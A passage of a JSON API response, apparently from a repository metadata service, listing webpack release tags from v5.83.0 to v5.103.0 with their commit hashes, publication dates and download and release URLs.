v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"